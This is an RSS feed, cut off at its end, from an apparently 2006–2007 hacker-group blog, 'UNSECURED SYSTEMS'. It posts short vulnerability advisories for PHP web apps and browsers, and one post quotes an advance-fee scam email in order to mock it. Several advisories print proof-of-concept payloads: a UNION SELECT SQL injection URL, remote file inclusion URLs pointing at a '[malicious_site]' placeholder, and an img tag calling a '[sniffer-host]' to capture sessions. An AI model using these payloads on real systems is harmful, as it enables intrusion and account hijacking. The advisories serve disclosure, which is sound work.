<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-15362515</atom:id><lastBuildDate>Tue, 08 Dec 2009 05:56:40 +0000</lastBuildDate><title>- UNSECURED SYSTEMS -</title><description>by r0t,der4444,cembo,VietMafia</description><link>http://pridels0.blogspot.com/</link><managingEditor>noreply@blogger.com (r0t)</managingEditor><generator>Blogger</generator><openSearch:totalResults>620</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-1161580330072213293</guid><pubDate>Thu, 17 May 2007 10:03:00 +0000</pubDate><atom:updated>2007-05-17T12:10:53.141+02:00</atom:updated><title>UNSECURED SYSTEMS vol.2 blog</title><description>we have new blog  &lt;a href="http://pridels-team.blogspot.com/"&gt;pridels-team.blogspot.com&lt;/a&gt;&lt;br /&gt;this blog will run only as archive, in new will be published fresh advisories and news from us.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-1161580330072213293?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/05/unsecured-systems-vol2-blog.html</link><author>noreply@blogger.com (der4444)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-907209568996290395</guid><pubDate>Wed, 02 May 2007 16:17:00 +0000</pubDate><atom:updated>2007-05-02T18:18:25.442+02:00</atom:updated><title>DVDdb XSS vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://globalmegacorp.org/dvddb/&lt;br /&gt;affected versions: 0.6 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DVDdb contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "movieid" parameter in "loan.php" and "s" parameter in "listmovies.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-907209568996290395?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/05/dvddb-xss-vuln.html</link><author>noreply@blogger.com (der4444)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-6731191783102374360</guid><pubDate>Wed, 02 May 2007 16:10:00 +0000</pubDate><atom:updated>2007-05-02T18:12:26.426+02:00</atom:updated><title>PHPChain vuln.</title><description>PHPChain vuln.&lt;br /&gt;###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://www.globalmegacorp.org/PHPChain/&lt;br /&gt;affected versions: 1.0 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;PHPChain contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catid" parameter in "settings.php" and in "cat.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;Also there is full path disclosure , "attacker" will get full installisations path by testing XSS examples in vuln. parameters.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-6731191783102374360?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/05/phpchain-vuln.html</link><author>noreply@blogger.com (der4444)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-392855134382032742</guid><pubDate>Wed, 02 May 2007 02:24:00 +0000</pubDate><atom:updated>2007-05-02T04:38:42.092+02:00</atom:updated><title>FileRun Vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://filerun.dreamhosters.com/&lt;br /&gt;affected versions: 1.0 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;FileRun contains a flaw that allows a remote sql injection attacks.Input passed to the "fid" parameter isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;FileRun contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page","module","section"  isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-392855134382032742?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/05/filerun-vuln.html</link><author>noreply@blogger.com (der4444)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-117516478286002294</guid><pubDate>Thu, 29 Mar 2007 11:32:00 +0000</pubDate><atom:updated>2007-04-13T15:04:09.986+02:00</atom:updated><title>AlstraSoft Video Share Enterprise - Information disclosure &amp; SQL injection vuln</title><description>&lt;p&gt;       &lt;/p&gt;============================&lt;br /&gt;discovered by : VietMafia&lt;br /&gt;developer's site: www.alstrasoft.com&lt;br /&gt;script: AlstraSoft Video Share Enterprise&lt;br /&gt;risk: medium&lt;br /&gt;status: unpatched&lt;br /&gt;============================&lt;br /&gt;&lt;br /&gt;This script has a vuln which can be exploited by malicious people to disclose sensitive information &amp; access to system as administrator.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed &amp;amp; edited after that.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://host/path/siteadmin/useredit.php?uid=userid&lt;br /&gt;&lt;br /&gt;2.SQL injection&lt;br /&gt;&lt;br /&gt;after we got access as a registered user there's a sql inj vuln in msg.php file&lt;br /&gt;&lt;br /&gt;poc :  http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1&lt;br /&gt;&lt;br /&gt;thanks DH for helping me verify this. :)&lt;br /&gt;&lt;br /&gt;===============================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-117516478286002294?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/03/alstrasoft-video-share-enterprise.html</link><author>noreply@blogger.com (VietMafia)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-117498091555004708</guid><pubDate>Tue, 27 Mar 2007 08:34:00 +0000</pubDate><atom:updated>2007-03-31T09:15:49.166+02:00</atom:updated><title>come back</title><description>Der4444,&lt;br /&gt;&lt;br /&gt;check ur email krustevs at gmail. I dont see you on icq.&lt;br /&gt;&lt;br /&gt;Vietmafia&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-117498091555004708?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/03/come-back.html</link><author>noreply@blogger.com (VietMafia)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-117208285220614136</guid><pubDate>Wed, 21 Feb 2007 18:34:00 +0000</pubDate><atom:updated>2007-03-27T17:43:21.876+02:00</atom:updated><title>Crash.</title><description>Hello guys!&lt;br /&gt;No new entries for long time , board is down more than half year.&lt;br /&gt;Everthing looks dead, so it was also.&lt;br /&gt;Lets say somebody from us had alot of jobs behind this scene other ones take some hollydays.&lt;br /&gt;But now i think we can continue wht we had started.&lt;br /&gt;I still miss contacts to Vietmafia and cembo,but guys if you read this post let me know if we can count of you in team.&lt;br /&gt;Just mail me krustevs at gmail&lt;br /&gt;or via icq 476010452&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-117208285220614136?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2007/02/crash.html</link><author>noreply@blogger.com (der4444)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115687637581495213</guid><pubDate>Tue, 29 Aug 2006 18:30:00 +0000</pubDate><atom:updated>2007-02-26T23:11:53.396+01:00</atom:updated><title>A Book A Day</title><description>From this day forward you will be able to find a new e-book about programming, every day. They are posted at &lt;a href="http://www.unsecured-systems.com/forum/"&gt;our forums&lt;/a&gt;. E-books about other topics coming soon as well.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115687637581495213?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/08/book-day.html</link><author>noreply@blogger.com (cembo)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115336487921012393</guid><pubDate>Thu, 20 Jul 2006 03:06:00 +0000</pubDate><atom:updated>2007-03-10T13:40:00.403+01:00</atom:updated><title>PhpHostBot remote File Inclusion Vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 july 2006&lt;br /&gt;vendor:www.idevspot.com/PhpHostBot.php&lt;br /&gt;affected versions:PhpHostBot 1.0 / AutoHost 3.0 &lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vulnerability Description:&lt;br /&gt;&lt;br /&gt;PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.&lt;br /&gt;User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://[victim]/order/index.php?page=http://[malicious_site]/file&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115336487921012393?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/07/phphostbot-remote-file-inclusion-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115336471428373023</guid><pubDate>Thu, 20 Jul 2006 03:03:00 +0000</pubDate><atom:updated>2006-08-23T16:40:47.013+02:00</atom:updated><title>PhpLinkExchange remote File Inclusion Vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 july 2006&lt;br /&gt;vendor:www.idevspot.com/PhpLinkExchange.php&lt;br /&gt;affected versions: 1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vulnerability Description:&lt;br /&gt;&lt;br /&gt;PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.&lt;br /&gt;User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://[victim]/index.php?page=http://[malicious_site]/file&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115336471428373023?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/07/phplinkexchange-remote-file-inclusion.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115262268249583202</guid><pubDate>Tue, 11 Jul 2006 12:56:00 +0000</pubDate><atom:updated>2007-02-27T02:00:41.976+01:00</atom:updated><title>HiveMail vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 11 july 2006&lt;br /&gt;vendor:http://hivemail.com/&lt;br /&gt;affected versions:&lt;br /&gt;tested on 1.3 and 1.2 versions &lt;br /&gt;other versions also can be affected. &lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;HiveMail contains a flaw that allows a remote sql injection attacks.Input passed to the "fields[]" parameter in "search.results.php"  isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;HiveMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "email","cond","name" parameters in "addressbook.view.php" and input passed to the "daysprune" parameter in "index.php" and input passed to the "data[to]" parameter in "compose.email.php" and input passed to the "markas" parameter in "read.markas.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;3. &lt;br /&gt;It is also possible to disclose the full path to "search.results.php" by defining "searchdate" and "folderids"  parameters.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115262268249583202?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/07/hivemail-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115175872491883323</guid><pubDate>Sat, 01 Jul 2006 12:44:00 +0000</pubDate><atom:updated>2007-02-13T20:16:42.396+01:00</atom:updated><title>Scamming</title><description>&lt;blockquote&gt;&lt;br /&gt;Title:Please, I need to hear from you now   &lt;br /&gt;&lt;br /&gt;From:Dr. James Ransome &lt;jamesransome20066@zonai.com&gt;  &lt;br /&gt;at:30. Juni 2006 09:06&lt;br /&gt;&lt;br /&gt;Barclays Bank Plc&lt;br /&gt;London, United Kingdom&lt;br /&gt;I am Dr. James Ransome , Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.&lt;br /&gt;In my department we discovered an abandoned sum of £12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines&lt;br /&gt;Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.&lt;br /&gt;&lt;http://www.cnn.com/2000/US/02/01/alaska.airlines.list/&gt;&lt;br /&gt;Since we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.&lt;br /&gt;Unfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.&lt;br /&gt;We agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.&lt;br /&gt;Note that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard.&lt;br /&gt;Please note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.&lt;br /&gt;Please in your response include your telephone and fax numbers for a better communication between us.&lt;br /&gt;You can reach me on the email below&lt;br /&gt;Best regards&lt;br /&gt;James Ransome&lt;br /&gt;Email: jamesransome20067@zonai.com&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;He he, first at all If some person will say that he works for some company, thats means thathe also will use that company´s email and not from "zonai.com"&lt;br /&gt;But thats also not a point ,with emails there is alot of tricks how to survive .&lt;br /&gt;&lt;br /&gt;Next point is how like in this example Brclays bank manager have my email?&lt;br /&gt;Let me answer , my email you will become with spammers software like Mail grabber.&lt;br /&gt;&lt;br /&gt;OK. that we everybody now, that money is stollen not from dead American person , but for normal live costumers from some ecommerce site on net or using some poor IE exploits to get they trojan on victims maschine.&lt;br /&gt;&lt;br /&gt;For me is intrestnig, that point... if you will say that you had belived to those gangsters  and they used your bank account for they illegal money transfers, than you are not guilty. &lt;br /&gt;&lt;br /&gt;But lets say, that you belived to those gangsters , but you was to greedy to be happy with they offered 20%  and you taked all money. &lt;br /&gt;&lt;br /&gt;In both ways you will get in contact with your country law instances. &lt;br /&gt;&lt;br /&gt;And guess wich way is better ?&lt;br /&gt;&lt;br /&gt;Third one?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115175872491883323?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/07/scamming.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115143614539370515</guid><pubDate>Tue, 27 Jun 2006 19:20:00 +0000</pubDate><atom:updated>2007-04-12T06:02:48.493+02:00</atom:updated><title>Multiple Browsers Information Disclosure vuln.</title><description>Multiple Browsers Information Disclosure vuln.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Multiple Browsers contains a flaw which can be exploited by malicious people to disclose potentially sensitive information.&lt;br /&gt;An error in the handling of redirections can be exploited to access documents served from another web site via the "object.documentElement.outerHTML" property. &lt;br /&gt;&lt;br /&gt;Affected browsers:&lt;br /&gt;&lt;br /&gt;MYweb4net Browser 3.8.8.0&lt;br /&gt;http://www.mybrowser.web4net.net/&lt;br /&gt;&lt;br /&gt;GreenBrowser 3.4.0622&lt;br /&gt;http://www.morequick.com/&lt;br /&gt;&lt;br /&gt;Maxthon v1.5.6 build 42&lt;br /&gt;http://www.maxthon.com/&lt;br /&gt;&lt;br /&gt;PhaseOut 5.4.4&lt;br /&gt;http://www.phaseout.net/&lt;br /&gt;&lt;br /&gt;FineBrowser Freeware version v3.2.2&lt;br /&gt;http://www.finebrowser.com/&lt;br /&gt;&lt;br /&gt;Slim Browser 4.07 build 100&lt;br /&gt;http://www.flashpeak.com/&lt;br /&gt;&lt;br /&gt;NetCaptor 4.5.7 Personal Edition&lt;br /&gt;http://www.netcaptor.com/&lt;br /&gt;&lt;br /&gt;Enigma Browser 3.8.8&lt;br /&gt;http://www.suttondesigns.com/&lt;br /&gt;&lt;br /&gt;Fast Browser  Pro 8.1&lt;br /&gt;http://fastbrowser.net/&lt;br /&gt;&lt;br /&gt;GoSuRF Browser 2.62&lt;br /&gt;http://gosurfbrowser.com/?ln=en&lt;br /&gt;&lt;br /&gt;Previous versions off those browsers also can be affected.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tested on Windows XP/SP2 and IE 6 ( some of those browsers use IE engine to run, but offcourse not vuln. IE 6.0 was used for that tests.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;note: This advisory is based on Plebo Aesdi Nael advisory in IE.&lt;br /&gt;&lt;br /&gt;Reff url: http://secunia.com/advisories/20825/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Disable Active Scripting support.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115143614539370515?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/multiple-browsers-information.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115141620046398827</guid><pubDate>Tue, 27 Jun 2006 13:49:00 +0000</pubDate><atom:updated>2007-04-12T06:03:12.193+02:00</atom:updated><title>Hostflow vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;vendor:http://www.hostflow.com/&lt;br /&gt;affected versions:2.2.1-15 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Hostflow contains a flaw which could allow a remote attacker to hijack user sessions.  A remote attacker can retrieve the authentication information to hijack a user session if a user includes a URL link within a helpdesk message because in default there isn't IP address verification. This would allow the attacker to take control victims control panel.   &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;post: &lt;br /&gt;(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")&lt;br /&gt;note: change "(" to "&lt;" and ")" to "&gt;" &lt;br /&gt;&lt;br /&gt;2. or it also will works with simple refferal url function. &lt;br /&gt;For manual testing use html code and create hyperlink to resource wich will show you refferal url´s in example some hit counter or statistic apllication do it well. &lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115141620046398827?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/hostflow-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115138273462034549</guid><pubDate>Tue, 27 Jun 2006 04:31:00 +0000</pubDate><atom:updated>2006-11-25T18:34:54.560+01:00</atom:updated><title>HSPcomplete vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;vendor:http://www.swsoft.com/en/products/hspcomplete/&lt;br /&gt;affected versions:3.2.2 , 3.3 Beta and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;HSPcomplete contains a flaw that allows a remote sql injection attacks.Input passed to the "type" parameter in "report.php" and input passed to the "level" parameter in "custom_buttons.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115138273462034549?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/hspcomplete-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115137931935113156</guid><pubDate>Tue, 27 Jun 2006 03:34:00 +0000</pubDate><atom:updated>2006-06-28T15:23:13.163+02:00</atom:updated><title>H-Sphere &lt;=2.5.x XSS vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;vendor:http://www.psoft.net/h_sphere2_info.html&lt;br /&gt;affected versions:2.5.1 Beta 1 (2.5.1.801.20060621)&lt;br /&gt;and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;H-Sphere contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "next_template","start","curr_menu_id","arid" parameters isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP&lt;br /&gt;?template_name=mailman/massmail.html&amp;arid=46&amp;curr_&lt;br /&gt;menu_id=&amp;start=&amp;next_template=[XSS]&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP&lt;br /&gt;?template_name=mailman/massmail.html&amp;arid=46&amp;curr_men&lt;br /&gt;u_id=&amp;start=[XSS]&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP&lt;br /&gt;?template_name=mailman/massmail.html&amp;arid=46&amp;curr_me&lt;br /&gt;nu_id=[XSS]&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.C&lt;br /&gt;P?template_name=mailman/massmail.html&amp;arid=[XSS]&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115137931935113156?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/h-sphere-25x-xss-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115134858020805345</guid><pubDate>Mon, 26 Jun 2006 19:01:00 +0000</pubDate><atom:updated>2007-03-29T02:28:39.916+02:00</atom:updated><title>Zorum Forum &lt;=3.5 vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 26 june 2006&lt;br /&gt;vendor:http://zorum.phpoutsourcing.com/&lt;br /&gt;affected versions:3.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;Zorum Forum contains a flaw that allows a remote sql injection attacks.Input passed to the "offset","tid","fromid","sortby","fromfrommethod","fromfromlist" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;Zorum Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "frommethod","list","method"  parameter in "index.php" and most parameters from SQL injection vuln. isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Additional info:&lt;br /&gt;Some of those parameters by both vulnerabilities will give Full Path Disclosure and there will be many other parameters wich isnt  properly sanitised.&lt;br /&gt;And if it will be not enough you can aslo figure out something like sql injection form search engine module, just try to add in any possible field some "unsanitised" input and you will see. &lt;br /&gt;&lt;br /&gt;ref:&lt;br 